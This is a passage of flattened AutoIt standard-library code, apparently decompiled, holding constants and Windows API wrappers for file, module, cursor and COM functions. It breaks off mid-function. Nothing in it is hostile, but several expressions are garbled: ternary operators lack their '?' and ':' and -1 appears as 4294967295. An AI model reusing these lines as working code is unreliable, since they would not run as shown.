GLOBAL CONST $MOUSE_CLICK_MAIN = "main" GLOBAL CONST $MOUSE_CLICK_MENU = "menu" GLOBAL CONST $MOUSE_CLICK_PRIMARY = "primary" GLOBAL CONST $MOUSE_CLICK_SECONDARY = "secondary" GLOBAL CONST $MOUSE_WHEEL_UP = "up" GLOBAL CONST $MOUSE_WHEEL_DOWN = "down" GLOBAL CONST $NUMBER_AUTO = 0 GLOBAL CONST $NUMBER_32BIT = 1 GLOBAL CONST $NUMBER_64BIT = 2 GLOBAL CONST $NUMBER_DOUBLE = 3 GLOBAL CONST $OBJ_NAME = 1 GLOBAL CONST $OBJ_STRING = 2 GLOBAL CONST $OBJ_PROGID = 3 GLOBAL CONST $OBJ_FILE = 4 GLOBAL CONST $OBJ_MODULE = 5 GLOBAL CONST $OBJ_CLSID = 6 GLOBAL CONST $OBJ_IID = 7 GLOBAL CONST $EXITCLOSE_NORMAL = 0 GLOBAL CONST $EXITCLOSE_BYEXIT = 1 GLOBAL CONST $EXITCLOSE_BYCLICK = 2 GLOBAL CONST $EXITCLOSE_BYLOGOFF = 3 GLOBAL CONST $EXITCLOSE_BYSHUTDOWN = 4 GLOBAL CONST $PROCESS_STATS_MEMORY = 0 GLOBAL CONST $PROCESS_STATS_IO = 1 GLOBAL CONST $PROCESS_LOW = 0 GLOBAL CONST $PROCESS_BELOWNORMAL = 1 GLOBAL CONST $PROCESS_NORMAL = 2 GLOBAL CONST $PROCESS_ABOVENORMAL = 3 GLOBAL CONST $PROCESS_HIGH = 4 GLOBAL CONST $PROCESS_REALTIME = 5 GLOBAL CONST $RUN_LOGON_NOPROFILE = 0 GLOBAL CONST $RUN_LOGON_PROFILE = 1 GLOBAL CONST $RUN_LOGON_NETWORK = 2 GLOBAL CONST $RUN_LOGON_INHERIT = 4 GLOBAL CONST $SOUND_NOWAIT = 0 GLOBAL CONST $SOUND_WAIT = 1 GLOBAL CONST $SHEX_OPEN = "open" GLOBAL CONST $SHEX_EDIT = "edit" GLOBAL CONST $SHEX_PRINT = "print" GLOBAL CONST $SHEX_PROPERTIES = "properties" GLOBAL CONST $TCP_DATA_DEFAULT = 0 GLOBAL CONST $TCP_DATA_BINARY = 1 GLOBAL CONST $UDP_OPEN_DEFAULT = 0 GLOBAL CONST $UDP_OPEN_BROADCAST = 1 GLOBAL CONST $UDP_DATA_DEFAULT = 0 GLOBAL CONST $UDP_DATA_BINARY = 1 GLOBAL CONST $UDP_DATA_ARRAY = 2 GLOBAL CONST $TIP_NOICON = 0 GLOBAL CONST $TIP_INFOICON = 1 GLOBAL CONST $TIP_WARNINGICON = 2 GLOBAL CONST $TIP_ERRORICON = 3 GLOBAL CONST $TIP_BALLOON = 1 GLOBAL CONST $TIP_CENTER = 2 GLOBAL CONST $TIP_FORCEVISIBLE = 4 GLOBAL CONST $WINDOWS_NOONTOP = 0 GLOBAL CONST $WINDOWS_ONTOP = 1 GLOBAL CONST $WIN_STATE_EXISTS = 1 GLOBAL CONST $WIN_STATE_VISIBLE = 2 GLOBAL CONST $WIN_STATE_ENABLED = 4 GLOBAL CONST $WIN_STATE_ACTIVE = 8 GLOBAL CONST $WIN_STATE_MINIMIZED = 16 GLOBAL CONST $WIN_STATE_MAXIMIZED = 32 GLOBAL CONST $FC_NOOVERWRITE = 0 GLOBAL CONST $FC_OVERWRITE = 1 GLOBAL CONST $FC_CREATEPATH = 8 GLOBAL CONST $FT_MODIFIED = 0 GLOBAL CONST $FT_CREATED = 1 GLOBAL CONST $FT_ACCESSED = 2 GLOBAL CONST $FT_ARRAY = 0 GLOBAL CONST $FT_STRING = 1 GLOBAL CONST $FSF_CREATEBUTTON = 1 GLOBAL CONST $FSF_NEWDIALOG = 2 GLOBAL CONST $FSF_EDITCONTROL = 4 GLOBAL CONST $FT_NONRECURSIVE = 0 GLOBAL CONST $FT_RECURSIVE = 1 GLOBAL CONST $FO_READ = 0 GLOBAL CONST $FO_APPEND = 1 GLOBAL CONST $FO_OVERWRITE = 2 GLOBAL CONST $FO_CREATEPATH = 8 GLOBAL CONST $FO_BINARY = 16 GLOBAL CONST $FO_UNICODE = 32 GLOBAL CONST $FO_UTF16_LE = 32 GLOBAL CONST $FO_UTF16_BE = 64 GLOBAL CONST $FO_UTF8 = 128 GLOBAL CONST $FO_UTF8_NOBOM = 256 GLOBAL CONST $FO_ANSI = 512 GLOBAL CONST $FO_UTF16_LE_NOBOM = 1024 GLOBAL CONST $FO_UTF16_BE_NOBOM = 2048 GLOBAL CONST $FO_UTF8_FULL = 16384 GLOBAL CONST $FO_FULLFILE_DETECT = 16384 GLOBAL CONST $EOF = + 4294967295 GLOBAL CONST $FD_FILEMUSTEXIST = 1 GLOBAL CONST $FD_PATHMUSTEXIST = 2 GLOBAL CONST $FD_MULTISELECT = 4 GLOBAL CONST $FD_PROMPTCREATENEW = 8 GLOBAL CONST $FD_PROMPTOVERWRITE = 16 GLOBAL CONST $CREATE_NEW = 1 GLOBAL CONST $CREATE_ALWAYS = 2 GLOBAL CONST $OPEN_EXISTING = 3 GLOBAL CONST $OPEN_ALWAYS = 4 GLOBAL CONST $TRUNCATE_EXISTING = 5 GLOBAL CONST $INVALID_SET_FILE_POINTER = + 4294967295 GLOBAL CONST $FILE_BEGIN = 0 GLOBAL CONST $FILE_CURRENT = 1 GLOBAL CONST $FILE_END = 2 GLOBAL CONST $FILE_ATTRIBUTE_READONLY = 1 GLOBAL CONST $FILE_ATTRIBUTE_HIDDEN = 2 GLOBAL CONST $FILE_ATTRIBUTE_SYSTEM = 4 GLOBAL CONST $FILE_ATTRIBUTE_DIRECTORY = 16 GLOBAL CONST $FILE_ATTRIBUTE_ARCHIVE = 32 GLOBAL CONST $FILE_ATTRIBUTE_DEVICE = 64 GLOBAL CONST $FILE_ATTRIBUTE_NORMAL = 128 GLOBAL CONST $FILE_ATTRIBUTE_TEMPORARY = 256 GLOBAL CONST $FILE_ATTRIBUTE_SPARSE_FILE = 512 GLOBAL CONST $FILE_ATTRIBUTE_REPARSE_POINT = 1024 GLOBAL CONST $FILE_ATTRIBUTE_COMPRESSED = 2048 GLOBAL CONST $FILE_ATTRIBUTE_OFFLINE = 4096 GLOBAL CONST $FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 8192 GLOBAL CONST $FILE_ATTRIBUTE_ENCRYPTED = 16384 GLOBAL CONST $FILE_SHARE_READ = 1 GLOBAL CONST $FILE_SHARE_WRITE = 2 GLOBAL CONST $FILE_SHARE_DELETE = 4 GLOBAL CONST $FILE_SHARE_READWRITE = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE ) GLOBAL CONST $FILE_SHARE_ANY = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE , $FILE_SHARE_DELETE ) GLOBAL CONST $GENERIC_ALL = 268435456 GLOBAL CONST $GENERIC_EXECUTE = 536870912 GLOBAL CONST $GENERIC_WRITE = 1073741824 GLOBAL CONST $GENERIC_READ = 2147483648 GLOBAL CONST $GENERIC_READWRITE = BITOR ($GENERIC_READ , $GENERIC_WRITE ) GLOBAL CONST $FILE_ENCODING_UTF16LE = 32 GLOBAL CONST $FE_ENTIRE_UTF8 = 1 GLOBAL CONST $FE_PARTIALFIRST_UTF8 = 2 GLOBAL CONST $FN_FULLPATH = 0 GLOBAL CONST $FN_RELATIVEPATH = 1 GLOBAL CONST $FV_COMMENTS = "Comments" GLOBAL CONST $FV_COMPANYNAME = "CompanyName" GLOBAL CONST $FV_FILEDESCRIPTION = "FileDescription" GLOBAL CONST $FV_FILEVERSION = "FileVersion" GLOBAL CONST $FV_INTERNALNAME = "InternalName" GLOBAL CONST $FV_LEGALCOPYRIGHT = "LegalCopyright" GLOBAL CONST $FV_LEGALTRADEMARKS = "LegalTrademarks" GLOBAL CONST $FV_ORIGINALFILENAME = "OriginalFilename" GLOBAL CONST $FV_PRODUCTNAME = "ProductName" GLOBAL CONST $FV_PRODUCTVERSION = "ProductVersion" GLOBAL CONST $FV_PRIVATEBUILD = "PrivateBuild" GLOBAL CONST $FV_SPECIALBUILD = "SpecialBuild" GLOBAL CONST $FRTA_NOCOUNT = 0 GLOBAL CONST $FRTA_COUNT = 1 GLOBAL CONST $FRTA_INTARRAYS = 2 GLOBAL CONST $FRTA_ENTIRESPLIT = 4 GLOBAL CONST $FLTA_FILESFOLDERS = 0 GLOBAL CONST $FLTA_FILES = 1 GLOBAL CONST $FLTA_FOLDERS = 2 GLOBAL CONST $FLTAR_FILESFOLDERS = 0 GLOBAL CONST $FLTAR_FILES = 1 GLOBAL CONST $FLTAR_FOLDERS = 2 GLOBAL CONST $FLTAR_NOHIDDEN = 4 GLOBAL CONST $FLTAR_NOSYSTEM = 8 GLOBAL CONST $FLTAR_NOLINK = 16 GLOBAL CONST $FLTAR_NORECUR = 0 GLOBAL CONST $FLTAR_RECUR = 1 GLOBAL CONST $FLTAR_NOSORT = 0 GLOBAL CONST $FLTAR_SORT = 1 GLOBAL CONST $FLTAR_FASTSORT = 2 GLOBAL CONST $FLTAR_NOPATH = 0 GLOBAL CONST $FLTAR_RELPATH = 1 GLOBAL CONST $FLTAR_FULLPATH = 2 GLOBAL CONST $PATH_ORIGINAL = 0 GLOBAL CONST $PATH_DRIVE = 1 GLOBAL CONST $PATH_DIRECTORY = 2 GLOBAL CONST $PATH_FILENAME = 3 GLOBAL CONST $PATH_EXTENSION = 4 GLOBAL CONST $MB_OK = 0 GLOBAL CONST $MB_OKCANCEL = 1 GLOBAL CONST $MB_ABORTRETRYIGNORE = 2 GLOBAL CONST $MB_YESNOCANCEL = 3 GLOBAL CONST $MB_YESNO = 4 GLOBAL CONST $MB_RETRYCANCEL = 5 GLOBAL CONST $MB_CANCELTRYCONTINUE = 6 GLOBAL CONST $MB_HELP = 16384 GLOBAL CONST $MB_ICONSTOP = 16 GLOBAL CONST $MB_ICONERROR = 16 GLOBAL CONST $MB_ICONHAND = 16 GLOBAL CONST $MB_ICONQUESTION = 32 GLOBAL CONST $MB_ICONEXCLAMATION = 48 GLOBAL CONST $MB_ICONWARNING = 48 GLOBAL CONST $MB_ICONINFORMATION = 64 GLOBAL CONST $MB_ICONASTERISK = 64 GLOBAL CONST $MB_USERICON = 128 GLOBAL CONST $MB_DEFBUTTON1 = 0 GLOBAL CONST $MB_DEFBUTTON2 = 256 GLOBAL CONST $MB_DEFBUTTON3 = 512 GLOBAL CONST $MB_DEFBUTTON4 = 768 GLOBAL CONST $MB_APPLMODAL = 0 GLOBAL CONST $MB_SYSTEMMODAL = 4096 GLOBAL CONST $MB_TASKMODAL = 8192 GLOBAL CONST $MB_DEFAULT_DESKTOP_ONLY = 131072 GLOBAL CONST $MB_RIGHT = 524288 GLOBAL CONST $MB_RTLREADING = 1048576 GLOBAL CONST $MB_SETFOREGROUND = 65536 GLOBAL CONST $MB_TOPMOST = 262144 GLOBAL CONST $MB_SERVICE_NOTIFICATION = 2097152 GLOBAL CONST $MB_RIGHTJUSTIFIED = $MB_RIGHT GLOBAL CONST $IDTIMEOUT = + 4294967295 GLOBAL CONST $IDOK = 1 GLOBAL CONST $IDCANCEL = 2 GLOBAL CONST $IDABORT = 3 GLOBAL CONST $IDRETRY = 4 GLOBAL CONST $IDIGNORE = 5 GLOBAL CONST $IDYES = 6 GLOBAL CONST $IDNO = 7 GLOBAL CONST $IDCLOSE = 8 GLOBAL CONST $IDHELP = 9 GLOBAL CONST $IDTRYAGAIN = 10 GLOBAL CONST $IDCONTINUE = 11 #Region Global Variables and Constants GLOBAL $__G_VENUM , $__G_VEXT = 0 GLOBAL $__G_IRGBMODE = 1 GLOBAL CONST $TAGOSVERSIONINFO = "struct;dword OSVersionInfoSize;dword MajorVersion;dword MinorVersion;dword BuildNumber;dword PlatformId;wchar CSDVersion[128];endstruct" GLOBAL CONST $IMAGE_BITMAP = 0 GLOBAL CONST $IMAGE_ICON = 1 GLOBAL CONST $IMAGE_CURSOR = 2 GLOBAL CONST $IMAGE_ENHMETAFILE = 3 GLOBAL CONST $LR_DEFAULTCOLOR = 0 GLOBAL CONST $LR_MONOCHROME = 1 GLOBAL CONST $LR_COLOR = 2 GLOBAL CONST $LR_COPYRETURNORG = 4 GLOBAL CONST $LR_COPYDELETEORG = 8 GLOBAL CONST $LR_LOADFROMFILE = 16 GLOBAL CONST $LR_LOADTRANSPARENT = 32 GLOBAL CONST $LR_DEFAULTSIZE = 64 GLOBAL CONST $LR_VGACOLOR = 128 GLOBAL CONST $LR_LOADMAP3DCOLORS = 4096 GLOBAL CONST $LR_CREATEDIBSECTION = 8192 GLOBAL CONST $LR_COPYFROMRESOURCE = 16384 GLOBAL CONST $LR_SHARED = 32768 GLOBAL CONST $__TAGCURSORINFO = "dword Size;dword Flags;handle hCursor;" & "struct;long X;long Y;endstruct" GLOBAL CONST $__WINVER = __WINVER () #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CREATEFILE ($SFILENAME , $ICREATION , $IACCESS = 4 , $ISHARE = 0 , $IATTRIBUTES = 0 , $TSECURITY = 0 ) LOCAL $IDA = 0 , $ISM = 0 , $ICD = 0 , $IFA = 0 IF BITAND ($IACCESS , 1 ) <> 0 THEN $IDA = BITOR ($IDA , $GENERIC_EXECUTE ) IF BITAND ($IACCESS , 2 ) <> 0 THEN $IDA = BITOR ($IDA , $GENERIC_READ ) IF BITAND ($IACCESS , 4 ) <> 0 THEN $IDA = BITOR ($IDA , $GENERIC_WRITE ) IF BITAND ($ISHARE , 1 ) <> 0 THEN $ISM = BITOR ($ISM , $FILE_SHARE_DELETE ) IF BITAND ($ISHARE , 2 ) <> 0 THEN $ISM = BITOR ($ISM , $FILE_SHARE_READ ) IF BITAND ($ISHARE , 4 ) <> 0 THEN $ISM = BITOR ($ISM , $FILE_SHARE_WRITE ) SWITCH $ICREATION CASE 0 $ICD = $CREATE_NEW CASE 1 $ICD = $CREATE_ALWAYS CASE 2 $ICD = $OPEN_EXISTING CASE 3 $ICD = $OPEN_ALWAYS CASE 4 $ICD = $TRUNCATE_EXISTING ENDSWITCH IF BITAND ($IATTRIBUTES , 1 ) <> 0 THEN $IFA = BITOR ($IFA , $FILE_ATTRIBUTE_ARCHIVE ) IF BITAND ($IATTRIBUTES , 2 ) <> 0 THEN $IFA = BITOR ($IFA , $FILE_ATTRIBUTE_HIDDEN ) IF BITAND ($IATTRIBUTES , 4 ) <> 0 THEN $IFA = BITOR ($IFA , $FILE_ATTRIBUTE_READONLY ) IF BITAND ($IATTRIBUTES , 8 ) <> 0 THEN $IFA = BITOR ($IFA , $FILE_ATTRIBUTE_SYSTEM ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "CreateFileW" , "wstr" , $SFILENAME , "dword" , $IDA , "dword" , $ISM , "struct*" , $TSECURITY , "dword" , $ICD , "dword" , $IFA , "ptr" , 0 ) IF @ERROR OR ($ARESULT [0 ] = PTR (+ 4294967295 ) ) THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FREELIBRARY ($HMODULE ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "FreeLibrary" , "handle" , $HMODULE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETCURSORINFO () LOCAL $TCURSOR = DLLSTRUCTCREATE ($__TAGCURSORINFO ) LOCAL $ICURSOR = DLLSTRUCTGETSIZE ($TCURSOR ) DLLSTRUCTSETDATA ($TCURSOR , "Size" , $ICURSOR ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetCursorInfo" , "struct*" , $TCURSOR ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ACURSOR [5 ] $ACURSOR [0 ] = TRUE $ACURSOR [1 ] = DLLSTRUCTGETDATA ($TCURSOR , "Flags" ) <> 0 $ACURSOR [2 ] = DLLSTRUCTGETDATA ($TCURSOR , "hCursor" ) $ACURSOR [3 ] = DLLSTRUCTGETDATA ($TCURSOR , "X" ) $ACURSOR [4 ] = DLLSTRUCTGETDATA ($TCURSOR , "Y" ) RETURN $ACURSOR ENDFUNC FUNC _WINAPI_GETDLGCTRLID ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "GetDlgCtrlID" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETMODULEHANDLE ($SMODULENAME ) LOCAL $SMODULENAMETYPE = "wstr" IF $SMODULENAME = "" THEN $SMODULENAME = 0 $SMODULENAMETYPE = "ptr" ENDIF LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "GetModuleHandleW" , $SMODULENAMETYPE , $SMODULENAME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETSTRING ($PSTRING , $BUNICODE = TRUE ) LOCAL $ILENGTH = _WINAPI_STRLEN ($PSTRING , $BUNICODE ) IF @ERROR OR NOT $ILENGTH THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) LOCAL $TSTRING = DLLSTRUCTCREATE (($BUNICODE "wchar" "char" ) & "[" & ($ILENGTH + 1 ) & "]" , $PSTRING ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETEXTENDED ($ILENGTH , DLLSTRUCTGETDATA ($TSTRING , 1 ) ) ENDFUNC FUNC _WINAPI_ISWOW64PROCESS ($IPID = 0 ) IF NOT $IPID THEN $IPID = @AUTOITPID LOCAL $HPROCESS = DLLCALL ("kernel32.dll" , "handle" , "OpenProcess" , "dword" , ($__WINVER < 1536 1024 4096 ) , "bool" , 0 , "dword" , $IPID ) IF @ERROR OR NOT $HPROCESS [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , FALSE ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "IsWow64Process" , "handle" , $HPROCESS [0 ] , "bool*" , 0 ) IF __CHECKERRORCLOSEHANDLE ($ARET , $HPROCESS [0 ] ) THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_LOADIMAGE ($HINSTANCE , $SIMAGE , $ITYPE , $IXDESIRED , $IYDESIRED , $ILOAD ) LOCAL $ARESULT , $SIMAGETYPE = "int" IF ISSTRING ($SIMAGE ) THEN $SIMAGETYPE = "wstr" $ARESULT = DLLCALL ("user32.dll" , "handle" , "LoadImageW" , "handle" , $HINSTANCE , $SIMAGETYPE , $SIMAGE , "uint" , $ITYPE , "int" , $IXDESIRED , "int" , $IYDESIRED , "uint" , $ILOAD ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_LOADLIBRARY ($SFILENAME ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "LoadLibraryW" , "wstr" , $SFILENAME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_PATHISDIRECTORY ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsDirectoryW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_READFILE ($HFILE , $PBUFFER , $ITOREAD , BYREF $IREAD , $TOVERLAPPED = 0 ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "ReadFile" , "handle" , $HFILE , "struct*" , $PBUFFER , "dword" , $ITOREAD , "dword*" , 0 , "struct*" , $TOVERLAPPED ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) $IREAD = $ARESULT [4 ] RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_STRLEN ($PSTRING , $BUNICODE = TRUE ) LOCAL $W = "" IF $BUNICODE THEN $W = "W" LOCAL $ARET = DLLCALL ("kernel32.dll" , "int" , "lstrlen" & $W , "struct*" , $PSTRING ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SWITCHCOLOR ($ICOLOR ) IF $ICOLOR = + 4294967295 THEN RETURN $ICOLOR RETURN BITOR (BITAND ($ICOLOR , 65280 ) , BITSHIFT (BITAND ($ICOLOR , 255 ) , + 4294967280 ) , BITSHIFT (BITAND ($ICOLOR , 16711680 ) , 16 ) ) ENDFUNC FUNC _WINAPI_WRITEFILE ($HFILE , $PBUFFER , $ITOWRITE , BYREF $IWRITTEN , $TOVERLAPPED = 0 ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "WriteFile" , "handle" , $HFILE , "struct*" , $PBUFFER , "dword" , $ITOWRITE , "dword*" , 0 , "struct*" , $TOVERLAPPED ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) $IWRITTEN = $ARESULT [4 ] RETURN $ARESULT [0 ] ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __CHECKERRORARRAYBOUNDS (CONST BYREF $ADATA , BYREF $ISTART , BYREF $IEND , $NDIM = 1 , $IDIM = $UBOUND_DIMENSIONS ) IF NOT ISARRAY ($ADATA ) THEN RETURN SETERROR (1 , 0 , 1 ) IF UBOUND ($ADATA , $IDIM ) <> $NDIM THEN RETURN SETERROR (2 , 0 , 1 ) IF $ISTART < 0 THEN $ISTART = 0 LOCAL $IUBOUND = UBOUND ($ADATA ) + 4294967295 IF $IEND < 1 OR $IEND > $IUBOUND THEN $IEND = $IUBOUND IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , 1 ) RETURN 0 ENDFUNC FUNC __CHECKERRORCLOSEHANDLE ($ARET , $HFILE , $BLASTERROR = FALSE , $ICURERR = @ERROR , $ICUREXT = @EXTENDED ) IF NOT $ICURERR AND NOT $ARET [0 ] THEN $ICURERR = 10 LOCAL $ALASTERROR = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $HFILE ) IF $ICURERR THEN DLLCALL ("kernel32.dll" , "none" , "SetLastError" , "dword" , $ALASTERROR [0 ] ) IF $BLASTERROR THEN $ICUREXT = $ALASTERROR [0 ] RETURN SETERROR ($ICURERR , $ICUREXT , $ICURERR ) ENDFUNC FUNC __DLL ($SPATH , $BPIN = FALSE ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetModuleHandleExW" , "dword" , ($BPIN 1 2 ) , "wstr" , $SPATH , "ptr*" , 0 ) IF NOT $ARET [3 ] THEN LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "LoadLibraryW" , "wstr" , $SPATH ) IF NOT $ARESULT [0 ] THEN RETURN 0 ENDIF RETURN 1 ENDFUNC FUNC __ENUMWINDOWSPROC ($HWND , $BVISIBLE ) LOCAL $ARESULT IF $BVISIBLE THEN $ARESULT = DLLCALL ("user32.dll" , "bool" , "IsWindowVisible" , "hwnd" , $HWND ) IF NOT $ARESULT [0 ] THEN RETURN 1 ENDIF ENDIF __INC ($__G_VENUM ) $__G_VENUM [$__G_VENUM [0 ] [0 ] ] [0 ] = $HWND $ARESULT = DLLCALL ("user32.dll" , "int" , "GetClassNameW" , "hwnd" , $HWND , "wstr" , "" , "int" , 4096 ) $__G_VENUM [$__G_VENUM [0 ] [0 ] ] [1 ] = $ARESULT [2 ] RETURN 1 ENDFUNC FUNC __FATALEXIT ($ICODE , $STEXT = "" ) IF $STEXT THEN MSGBOX ($MB_SYSTEMMODAL , "AutoIt" , $STEXT ) DLLCALL ("kernel32.dll" , "none" , "FatalExit" , "int" , $ICODE ) ENDFUNC FUNC __INC (BYREF $ADATA , $IINCREMENT = 100 ) SELECT CASE UBOUND ($ADATA , $UBOUND_COLUMNS ) IF $IINCREMENT < 0 THEN REDIM $ADATA [$ADATA [0 ] [0 ] + 1 ] [UBOUND ($ADATA , $UBOUND_COLUMNS ) ] ELSE $ADATA [0 ] [0 ] += 1 IF $ADATA [0 ] [0 ] > UBOUND ($ADATA ) + 4294967295 THEN REDIM $ADATA [$ADATA [0 ] [0 ] + $IINCREMENT ] [UBOUND ($ADATA , $UBOUND_COLUMNS ) ] ENDIF ENDIF CASE UBOUND ($ADATA , $UBOUND_ROWS ) IF $IINCREMENT < 0 THEN REDIM $ADATA [$ADATA [0 ] + 1 ] ELSE $ADATA [0 ] += 1 IF $ADATA [0 ] > UBOUND ($ADATA ) + 4294967295 THEN REDIM $ADATA [$ADATA [0 ] + $IINCREMENT ] ENDIF ENDIF CASE ELSE RETURN 0 ENDSELECT RETURN 1 ENDFUNC FUNC __RGB ($ICOLOR ) IF $__G_IRGBMODE THEN $ICOLOR = _WINAPI_SWITCHCOLOR ($ICOLOR ) ENDIF RETURN $ICOLOR ENDFUNC FUNC __WINVER () LOCAL $TOSVI = DLLSTRUCTCREATE ($TAGOSVERSIONINFO ) DLLSTRUCTSETDATA ($TOSVI , 1 , DLLSTRUCTGETSIZE ($TOSVI ) ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetVersionExW" , "struct*" , $TOSVI ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN BITOR (BITSHIFT (DLLSTRUCTGETDATA ($TOSVI , 2 ) , + 4294967288 ) , DLLSTRUCTGETDATA ($TOSVI , 3 ) ) ENDFUNC #EndRegion Internal Functions #Region Global Variables and Constants GLOBAL CONST $__TAGWINAPICOM_GUID = "struct;ulong Data1;ushort Data2;ushort Data3;byte Data4[8];endstruct" #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CLSIDFROMPROGID ($SPROGID ) LOCAL $TGUID = DLLSTRUCTCREATE ($__TAGWINAPICOM_GUID ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "long" , "CLSIDFromProgID" , "wstr" , $SPROGID , "struct*" , $TGUID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , "" ) $ARETURN = DLLCALL ("ole32.dll" , "int" , "StringFromGUID2" , "struct*" , $TGUID , "wstr" , "" , "int" , 39 ) IF @ERROR OR NOT $ARETURN [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , "" ) RETURN $ARETURN [2 ] ENDFUNC FUNC _WINAPI_COINITIALIZE ($IFLAGS = 0 ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "long" , "CoInitializeEx" , "ptr" , 0 , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_COTASKMEMALLOC ($ISIZE ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "ptr" , "CoTaskMemAlloc" , "uint_ptr" , $ISIZE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARETURN [0 ] ENDFUNC FUNC _WINAPI_COTASKMEMFREE ($PMEMORY ) DLLCALL ("ole32.dll" , "none" , "CoTaskMemFree" , "ptr" , $PMEMORY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_COTASKMEMREALLOC ($PMEMORY , $ISIZE ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "ptr" , "CoTaskMemRealloc" , "ptr" , $PMEMORY , "ulong_ptr" , $ISIZE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARETURN [0 ] ENDFUNC FUNC _WINAPI_COUNINITIALIZE () DLLCALL ("ole32.dll" , "none" , "CoUninitialize" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_CREATEGUID () LOCAL $TGUID = DLLSTRUCTCREATE ($__TAGWINAPICOM_GUID ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "long" , "CoCreateGuid" , "struct*" , $TGUID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , "" ) $ARETURN = DLLCALL ("ole32.dll" , "int" , "StringFromGUID2" , "struct*" , $TGUID , "wstr" , "" , "int" , 65536 ) IF @ERROR OR NOT $ARETURN [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , "" ) RETURN $ARETURN [2 ] ENDFUNC FUNC _WINAPI_CREATESTREAMONHGLOBAL ($HGLOBAL = 0 , $BDELETEONRELEASE = TRUE ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "long" , "CreateStreamOnHGlobal" , "handle" , $HGLOBAL , "bool" , $BDELETEONRELEASE , "ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARETURN [0 ] THEN RETURN SETERROR (10 , $ARETURN [0 ] , 0 ) RETURN $ARETURN [3 ] ENDFUNC FUNC _WINAPI_GETHGLOBALFROMSTREAM ($PSTREAM ) LOCAL $ARETURN = DLLCALL ("ole32.dll" , "uint" , "GetHGlobalFromStream" , "ptr" , $PSTREAM , "ptr*" , 0 